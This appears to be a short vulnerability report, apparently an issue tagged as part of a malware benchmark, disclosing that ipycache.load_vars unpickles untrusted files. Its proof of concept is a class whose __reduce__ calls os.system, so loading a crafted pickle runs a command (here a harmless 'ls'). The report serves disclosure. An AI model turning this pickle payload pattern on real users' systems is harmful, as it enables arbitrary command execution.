ipycache.load_vars method is vulnerable

[bigbigliang-malwarebenchmark]

import os
import pickle
import ipycache

class Test(object):

def __init__(self):
    self.a = 1

def __reduce__(self):
    return (os.system,('ls',))

tmpdaa = Test()
with open("a-file.pickle",'wb') as f:

pickle.dump(tmpdaa,f)

ipycache.load_vars('a-file.pickle','')

Hi，ipycache.load_vars function with evil data will cause command execution,if attack share evil data on internet,when user load it , it will cause command execution.